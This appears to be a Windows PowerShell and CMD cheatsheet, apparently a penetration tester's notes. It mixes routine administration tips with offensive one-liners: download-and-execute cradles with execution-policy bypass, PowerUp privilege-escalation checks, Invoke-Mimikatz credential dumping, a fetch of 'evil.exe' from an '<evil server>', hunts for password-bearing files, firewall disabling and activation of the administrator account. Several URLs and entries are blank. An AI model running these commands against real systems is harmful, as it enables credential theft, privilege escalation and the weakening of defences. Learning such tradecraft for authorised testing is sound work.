Windows Command Line Cheatsheet


Enable ISE using powershell

In the few months that I've been developing powershell, I've found the ISE to be incredibly useful. If you get on a new machine and the ISE isn't there, here's how you can get it going in the powershell terminal:

Import-Module ServerManager
Add-WindowsFeature Powershell-ISE

Securely store credentials in XML for Import

Start out by storing your username and password (in a SecureString format) in a PSCredential object:

$cred = Get-Credential

Next, go ahead and export your credentials to an xml file:

$cred | Export-CliXml <location>.clixml

Finally, when you need it, go ahead and import the credentials from the xml file and stored them in a variable ($cred2 in this particular scenario):

$cred2 = Import-CliXml <location>.clixml

Command output to file

Append this to whatever you're running to get the output in a text file:

| Out-File <location>

For example, if we want to run Invoke-AllChecks from PowerUp and output in a file called output.txt in C:\temp:

Invoke-AllChecks | Out-File C:\temp\output.txt

Command output to clipboard

Command | Clip

Require powershell script run as admin

Add this to the top of the powershell file: #Requires -RunAsAdministrator


Download file

powershell -exec bypass -c "(New-Object Net.WebClient).DownloadFile('','C:\temp\launcher.bat')"

Download PowerUp with Powershell <= v.2.0

This will get you the PowerUp powershell script and put it in C:\Temp, or some folder that the user you're on has permissions to write to.

You can also modify this snippet to download files if wget isn't available.

$WebClient = New-Object System.Net.WebClient

one-liner alternative:

(New-Object System.Net.WebClient).DownloadFile("","C:\Temp\PowerUp.ps1")

another one:

powershell.exe -ep bypass -e IEX ((new-object net.webclient).downloadstring(''))

Another to decode and execute a base64 powershell payload can be found here.

Using PowerUp

import-module c:\PowerUp\powerup.ps1
# Run all the checks

PowerUp one-liner

Get PowerUp, run it, and output to a text file so we can read the output easily.
powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks > C:\Temp\PU.txt

Powershell MimiKatz

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz

Tail a logfile

You can effectively tail -f the last two lines from a log file with the following:
Get-Content logfile.log -Tail 2 –Wait

Run Powershell Script to get around execution of scripts disabled error

powershell -ExecutionPolicy Bypass -File <file>.ps1

Download sysinternals

First you need to ignore ssl trust:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
then you can download it:
(New-Object System.Net.WebClient).DownloadFile("","C:\Temp\")

Useful powershell one-liners:

Get hostname:
List local accounts on a system:
Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'"
Check if system is joined to a domain or a workgroup:
if ((gwmi win32_computersystem).partofdomain -eq $true) { write-host -fore green 'This system is on a domain' } else { write-host -fore red 'This system is part of a workgroup' }

Set environment variable


Show env vars in running script

gci env:* | sort-object <name>

Check if system is running a desktop version of windows

$windesktop = (gwmi win32_operatingsystem).OperatingSystemSKU -notmatch "(\b[7-9]|10|1[2-5]|1[7-9]|2[0-5])"                           
if ($windesktop) 
    write-output "OS is a flavor of Windows Desktop" 

Get Windows kernel version


Get list of IPv4 addr

(gwmi Win32_NetworkAdapterConfiguration | ? { $_.IPAddress -ne $null }).ipaddress

Change hostname

Get-WmiObject -Class Win32_ComputerSystem

Log script output to file

Start-Transcript -path c:\windows\temp\interesting.log -Append -force

# do stuff

exit 1001



wget http://<evil server>/evil.exe -Outfile evil.exe

Check Permissions for folder

icacls <path>

Netstat with find

This is an example of what I equate to running netstat and piping the results through grep in linux. In powershell however, you need to escape the double ticks or it will throw an error:

netstat -anob  | find `"443`"

Look for files with passwords:

dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*

Disable firewall

netsh advfirewall set allprofiles state off

Make administrator user active

net user administrator /active:yes

Set user password to never expire

net user user /expires:never /active:yes /logonpasswordchg:no

Useful CMD one-liners:

Open event viewer from cmd:
View the status of a service:
sc query <service name>
Stop service:
sc stop <service name>
Start service:
sc start <servicename>
Open services msc:
Lists all the service information for each process:
tasklist /svc
Kill a process by PID:
taskkill /pid <pid> /f
Kill firefox (or any process) by name:
taskkill /im firefox.exe /f
Delete a file:
del <file name>
List drives:
fsutil fsinfo drives
Show users with active sessions:
quser or query user
Show active network sessions:
netstat -vb
Get last modified file in a directory (conceptually similar to ls -lart):
dir /O:D /T:W /A:-D
Rename file:
move file new-file-name
Show contents of file:
type file.txt
Current current user and privilege info
whoami /all
List users
net users
List domain users and output to a file
net user /domain > domain-user-list.txt
List domain controller the current system is authenticated with
Get FSMO roles for current domain (useful info about domain controller setup)
List all domain controllers in the current domain
net group "Domain Controllers" /domain
Print password policy
net accounts
Reboot system
shutdown -r
Query the registry
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Remove a key from the registry
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /v hFaZvOAsF /f
Show environment variables